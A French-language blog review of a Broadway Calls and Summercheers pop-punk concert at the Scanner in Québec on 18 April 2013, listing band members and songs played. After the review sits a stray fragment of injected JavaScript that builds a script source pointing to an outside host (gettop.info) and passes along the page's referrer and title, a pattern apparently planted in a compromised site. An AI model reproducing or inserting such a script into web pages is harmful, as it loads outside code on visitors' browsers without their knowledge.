Critique de Broadway Calls et Summercheers, le 18 avril 2013 au Scanner.


Facebooktwitterredditpinterestlinkedinmail

C’est le 18 avril 2013, au Scanner, qu’a eu lieu le spectacle de Broadway Calls avec Summercheers. La salle était plutôt remplie, non pas à pleine capacité, mais suffisamment pour avoir une excellente ambiance.

Le groupe Summercheers de Québec embarque donc sur la scène vers 23h15. Le quatuor, ayant un son s’approchant du pop-punk californien, est composé de Benoît Fortier (guitare et voix), Sonny Letourneau (basse) et Karl-Maxime Boucher (guitare) et Vincent Brassard (batterie). Les membres ont donné une bonne prestation. Ils ont jouées quelques chansons de leur EP Beaches, ainsi que des plus récentes et un cover de The Methadones, Mess We Made. Un petit set d’environ 20-25 minutes qui a passé trop vite.

Petit temps d’arrêt pour laisser le temps à Broadway Calls de s’installer et aux plus fous d’entre nous d’aller s’acheter des boissons alcoolisées, question de s’hydrater pour les prochains sing along qui s’en viennent. Broadway Calls, un groupe pop-punk d’Oregon aux États-Unis embarque sur scène tel un vent de fraîcheur. Composé de Ty Vaughn (guitare et voix), Adam Willis (basse) et Josh Baird (batterie), la formation active depuis environ six à sept années a plusieurs chef-d’oeuvres à son tableau. En effet, ils ont sorti deux EPs dont un en 2006, Call The Medic et un en 2011, Toxic Kids. Ils ont aussi trois albums, soit Broadway Calls (2007), Good Views, Bad News (2009) et leur tout nouveau dernier, Comfort/Distraction (2013). De plus, ils ont des splits avec d’excellents groupes tels que Mixtapes, Teenage Bottlerocket et The Riot Before. Je crois que toutes les personnes dans le Scanner à ce moment précis avaient hâte d’entendre la première note. C’est sur un excellent choix de Good Views, Bad News qu’ils exécutent Basement Royalty. Par la suite, ils ont continué à enchaîner leurs plus que merveilleuses chansons, telles que Bring On The Storm, Lucky Lighter, Surrounded By Ghosts, Open Letter, Midnight Hour, Tonight Is Alive, Stealing Sailboats, Back To Oregon, Suffer The Kids, Call It Off, Be All That You Can’t Be, Van Rides And High Tides, Call It Off, Bad Intentions et Save Our Ship. Je crois avoir aussi entendu ces chansons-là, mais j’en suis moins sûre, des fois ça arrive qu’on oublie : Zombie World, To The Sheets, Three Weeks et Escape From Capitol Hill. Bref, un spectacle à la hauteur de mes attentes et qui a passé trop vite. J’aurais pris encore une heure, même s’il était déjà rendu 1h30 et que généralement, on travaille le vendredi matin.

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Photos: Comédie Club prise 3
Next Critique du Grand Rire Comédie Club de mercredi le 17 avril 2013 à l'Impérial de Québec

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *